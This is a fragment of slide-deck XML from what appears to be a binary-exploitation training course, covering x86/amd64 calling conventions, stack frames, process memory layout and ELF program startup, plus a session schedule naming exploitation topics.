          <p:spPr>
            <a:xfrm>
              <a:off x="3447575" y="1633500"/>
              <a:ext cx="965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, %ebp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4" name="Shape 524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25" name="Shape 525"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-122200" y="3100786"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="526" name="Shape 526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7" name="Shape 527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28" name="Shape 528"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550850" y="3021100"/>
            <a:ext cx="1339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mov   %ebp, $esp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9" name="Shape 529"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="528" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991650" y="3097300"/>
            <a:ext cx="559200" cy="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Shape 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550850" y="3100775"/>
            <a:ext cx="75600" cy="190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536" name="Shape 536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push   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%esp,%ebp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Shape 537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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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%eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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-0x4(%ebp),%eax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leave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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="Shape 538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5959800" y="1792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 b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight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5959800" y="2099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5959800" y="24067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5959800" y="27139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5959800" y="3021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5959800" y="3328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5959800" y="3635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5959800" y="39427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5959800" y="42499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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-122200" y="3100786"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="549" name="Shape 549"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="13240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%eip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50" name="Shape 550"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4151625" y="14542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51" name="Shape 551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550850" y="3021100"/>
            <a:ext cx="1339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%ebp, $esp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pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000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2" name="Shape 552"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="551" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991650" y="3097300"/>
            <a:ext cx="559200" cy="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Shape 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550850" y="3100775"/>
            <a:ext cx="75600" cy="190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4348812" y="1367206"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="555" name="Shape 555"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="112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endParaRPr b="1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56" name="Shape 556"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1770756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57" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="1177900"/>
            <a:ext cx="20286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ret addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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x="801000" y="3328300"/>
            <a:ext cx="3534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&lt;callee&gt;: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0:   55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push   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1:   89 e5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%esp,%ebp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3:   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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  5d          pop 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11:   c3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801000" y="1082650"/>
            <a:ext cx="35346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00000012 &lt;caller&gt;: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12:   55              push   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13:   89 e5           mov    %esp,%ebp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15:   83 ec 10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sub    $0x10,%esp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18:   6a 03           push   $0x3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1a:   6a 02           push   $0x2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1c:   6a 01           push   $0x1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1e:   e8 fc ff ff ff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call   1f &lt;callee&gt;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23:   83 c4 0c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add    $0xc,%esp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26:   89 45 fc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%eax,-0x4(%ebp)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29:   83 45 fc 04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addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc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   -0x4(%ebp),%eax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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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leave</a:t>
            </a:r>
            <a:endParaRPr sz="1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31:   c3              </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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ret</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight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5959800" y="1485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%ebp in caller's caller</a:t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5959800" y="1792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 b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight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5959800" y="2099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5959800" y="24067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5959800" y="27139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959800" y="30211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5959800" y="33283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5959800" y="3635500"/>
            <a:ext cx="2028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5959800" y="39427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5959800" y="4249900"/>
            <a:ext cx="20286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unused dword</a:t>
            </a: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4348812" y="1062406"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="576" name="Shape 576"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="112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rgbClr val="666666"/>
                  </a:highlight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endParaRPr b="1" sz="1000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7" name="Shape 577"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1770756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78" name="Shape 578"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="1177900"/>
            <a:ext cx="20286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 addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:highlight>
                <a:srgbClr val="666666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Convention(cdecl)</a:t>
            </a:r>
            <a:endParaRPr/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x86 cdecl calling convention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stack to pass arguments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$eax as return value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amd64 cdecl calling convention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%rdi, %rsi, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%rdx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>%rcx, %r8, %r9 as first six arguments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7th argument and onwards are passed on the stack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frame pointer %ebp (%rbp) is used for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referencing arguments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saving stack pointer %esp (%rsp)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Layout(Linux x86)</a:t>
            </a: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1192525" y="1085100"/>
            <a:ext cx="3894975" cy="3551150"/>
            <a:chOff x="3771275" y="1085100"/>
            <a:chExt cx="3894975" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="591" name="Shape 591"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>
              <a:ext cx="1363200" cy="2742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For Kernel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897550" y="1486975"/>
              <a:ext cx="1363200" cy="27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Stack</a:t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897550" y="1761175"/>
              <a:ext cx="1363200" cy="603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897550" y="2365075"/>
              <a:ext cx="1363200" cy="44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shared libraries</a:t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897550" y="2807875"/>
              <a:ext cx="1363200" cy="603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897550" y="3411775"/>
              <a:ext cx="1363200" cy="274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Heap</a:t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897550" y="3685975"/>
              <a:ext cx="1363200" cy="274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</a:t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897550" y="3960175"/>
              <a:ext cx="1363200" cy="27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Text</a:t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897550" y="4234375"/>
              <a:ext cx="1363200" cy="2742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Unused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600" name="Shape 600"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="593" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="36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1" name="Shape 601"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="596" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="33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2" name="Shape 602"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100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0xFFFFFFFF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6619250" y="1359300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0xC0000000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6619250" y="2674225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0x40000000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619250" y="4058550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0x08048000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06" name="Shape 606"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750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7" name="Shape 607"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950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8" name="Shape 608"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875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9" name="Shape 609"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500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0" name="Shape 610"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700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1" name="Shape 611"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050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0x00000000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3771275" y="16335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13" name="Shape 613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Frame</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="619" name="Shape 619"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="620" idx="3"/>
            <a:endCxn id="621" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4354200" y="1631850"/>
            <a:ext cx="600" cy="11211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22" name="Shape 622"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5016850" y="1225075"/>
            <a:ext cx="3036475" cy="3551150"/>
            <a:chOff x="5524975" y="1183600"/>
            <a:chExt cx="3036475" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="623" name="Shape 623"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5524975" y="1596175"/>
              <a:ext cx="238200" cy="2742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4" name="Shape 624"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5792750" y="1183600"/>
              <a:ext cx="2768700" cy="3551150"/>
              <a:chOff x="4897550" y="1085100"/>
              <a:chExt cx="2768700" cy="3551150"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="625" name="Shape 625"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1212775"/>
                <a:ext cx="1363200" cy="2742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For Kernel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26" name="Shape 626"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1486975"/>
                <a:ext cx="1363200" cy="2742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Stack</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="627" name="Shape 627"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1761175"/>
                <a:ext cx="1363200" cy="603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Shape 628"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2365075"/>
                <a:ext cx="1363200" cy="442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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="629" name="Shape 629"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2807875"/>
                <a:ext cx="1363200" cy="603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Shape 630"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3411775"/>
                <a:ext cx="1363200" cy="274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Heap</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="631" name="Shape 631"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3685975"/>
                <a:ext cx="1363200" cy="2742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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="632" name="Shape 632"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3960175"/>
                <a:ext cx="1363200" cy="2742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Text</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="633" name="Shape 633"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="2742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Unused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34" name="Shape 634"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="627" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1761175"/>
                <a:ext cx="0" cy="36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5" name="Shape 635"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="630" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5579150" y="3077575"/>
                <a:ext cx="0" cy="3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36" name="Shape 636"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="1085100"/>
                <a:ext cx="10470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Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0xFFFFFFFF</a:t>
                </a:r>
                <a:endParaRPr sz="1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37" name="Shape 637"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="1359300"/>
                <a:ext cx="10470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Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0xC0000000</a:t>
                </a:r>
                <a:endParaRPr sz="1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38" name="Shape 638"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="2674225"/>
                <a:ext cx="10470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Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x40000000</a:t>
                </a:r>
                <a:endParaRPr sz="1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39" name="Shape 639"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="4058550"/>
                <a:ext cx="10470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Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x08048000</a:t>
                </a:r>
                <a:endParaRPr sz="1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640" name="Shape 640"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="1218750"/>
                <a:ext cx="358500" cy="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1" name="Shape 641"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="1492950"/>
                <a:ext cx="358500" cy="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2" name="Shape 642"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="2807875"/>
                <a:ext cx="358500" cy="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3" name="Shape 643"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="4221500"/>
                <a:ext cx="358500" cy="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4" name="Shape 644"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="4495700"/>
                <a:ext cx="358500" cy="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45" name="Shape 645"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="4362050"/>
                <a:ext cx="10470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Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x00000000</a:t>
                </a:r>
                <a:endParaRPr sz="1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646" name="Shape 646"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="733025" y="1494750"/>
            <a:ext cx="4283825" cy="2779500"/>
            <a:chOff x="713400" y="1474025"/>
            <a:chExt cx="4283825" cy="2779500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="621" name="Shape 621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="1474025"/>
              <a:ext cx="2537400" cy="27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previous stack frame pointer</a:t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797175" y="1748225"/>
              <a:ext cx="2537400" cy="572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arguments</a:t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797175" y="2320925"/>
              <a:ext cx="2537400" cy="27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return address</a:t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797175" y="2595125"/>
              <a:ext cx="2537400" cy="274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stack frame pointer</a:t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797175" y="2869325"/>
              <a:ext cx="2537400" cy="274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callee saved registers</a:t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797175" y="3143525"/>
              <a:ext cx="2537400" cy="496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local variables</a:t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797175" y="3639725"/>
              <a:ext cx="2537400" cy="49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2" name="Shape 652"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="713400" y="3979325"/>
              <a:ext cx="1083775" cy="274200"/>
              <a:chOff x="4332275" y="4555900"/>
              <a:chExt cx="1083775" cy="274200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="653" name="Shape 653"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4332275" y="4555900"/>
                <a:ext cx="6414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Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>%esp</a:t>
                </a:r>
                <a:endParaRPr sz="1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654" name="Shape 654"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="4931250" y="4719100"/>
                <a:ext cx="484800" cy="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55" name="Shape 655"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="713400" y="2732225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%ebp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56" name="Shape 656"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="1312375" y="2865875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7" name="Shape 657"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355825" y="1482900"/>
              <a:ext cx="641400" cy="2652900"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd fmla="val 8333" name="adj1"/>
                <a:gd fmla="val 10163" name="adj2"/>
              </a:avLst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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="80" name="Shape 80"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1282475" y="151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{8672EFCA-FB07-4488-97D7-7D83822E2600}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1352675"/>
                <a:gridCol w="2388200"/>
                <a:gridCol w="2399600"/>
              </a:tblGrid>
              <a:tr h="40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basic knowledge and tools(zTrix)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heap exploitation(kelwin)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afternoon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overflow, rop, stack pivot, DynELF(zTrix)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CTF &amp; DEFCON(kelwin)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format string(zTrix)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geekpwn: embeded device hacking(kelwin)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static linked binary get run</a:t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1580975" y="1707450"/>
            <a:ext cx="1166400" cy="28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./binary</a:t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677975" y="2841350"/>
            <a:ext cx="2972400" cy="28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execve("./binary", *argv[], *envp[])</a:t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580975" y="2274400"/>
            <a:ext cx="1166400" cy="28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fork()</a:t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1384925" y="3506700"/>
            <a:ext cx="1558500" cy="28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sys_execve()</a:t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1384925" y="4129900"/>
            <a:ext cx="1558500" cy="28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do_execve()</a:t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4652175" y="4129900"/>
            <a:ext cx="2116500" cy="28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search_binary_handler()</a:t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4931175" y="3506700"/>
            <a:ext cx="1558500" cy="28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load_elf_binary()</a:t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5127225" y="2841350"/>
            <a:ext cx="1166400" cy="28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_start</a:t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5127225" y="2262263"/>
            <a:ext cx="1166400" cy="28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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="672" name="Shape 672"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="663" idx="2"/>
            <a:endCxn id="665" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="1995450"/>
            <a:ext cx="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Shape 673"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="665" idx="2"/>
            <a:endCxn id="664" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="2562400"/>
            <a:ext cx="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4" name="Shape 674"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="664" idx="2"/>
            <a:endCxn id="666" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="3129350"/>
            <a:ext cx="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Shape 675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="666" idx="2"/>
            <a:endCxn id="667" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="37947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Shape 676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="667" idx="3"/>
            <a:endCxn id="668" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2943425" y="4273900"/>
            <a:ext cx="17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Shape 677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="668" idx="0"/>
            <a:endCxn id="669" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5710425" y="37948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Shape 678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="669" idx="0"/>
            <a:endCxn id="670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5710425" y="3129300"/>
            <a:ext cx="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Shape 679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="670" idx="0"/>
            <a:endCxn id="671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5710425" y="2550350"/>
            <a:ext cx="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Shape 680"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="442675" y="3302650"/>
            <a:ext cx="8263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81" name="Shape 681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150900" y="2841350"/>
            <a:ext cx="1166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mode</a:t>
            </a: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7150900" y="3482850"/>
            <a:ext cx="1166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mode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dynamic linked binary get run</a:t>
            </a:r>
            <a:endParaRPr/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1580975" y="1707450"/>
            <a:ext cx="1166400" cy="28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./binary</a:t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677975" y="2841350"/>
            <a:ext cx="2972400" cy="28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execve("./binary", *argv[], *envp[])</a:t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580975" y="2274400"/>
            <a:ext cx="1166400" cy="28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fork()</a:t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384925" y="3506700"/>
            <a:ext cx="1558500" cy="28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sys_execve()</a:t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1384925" y="4129900"/>
            <a:ext cx="1558500" cy="28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do_execve()</a:t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4652175" y="4129900"/>
            <a:ext cx="2116500" cy="28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search_binary_handler()</a:t>
            </a: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4931175" y="3506700"/>
            <a:ext cx="1558500" cy="28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load_elf_binary()</a:t>
            </a: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5135325" y="2274388"/>
            <a:ext cx="1166400" cy="28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_start</a:t>
            </a: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4864125" y="1707450"/>
            <a:ext cx="1708800" cy="28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__libc_start_main()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="689" idx="2"/>
            <a:endCxn id="691" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="1995450"/>
            <a:ext cx="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Shape 699"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="691" idx="2"/>
            <a:endCxn id="690" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="2562400"/>
            <a:ext cx="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Shape 700"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="690" idx="2"/>
            <a:endCxn id="692" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="3129350"/>
            <a:ext cx="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Shape 701"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="692" idx="2"/>
            <a:endCxn id="693" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164175" y="37947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Shape 702"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="693" idx="3"/>
            <a:endCxn id="694" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
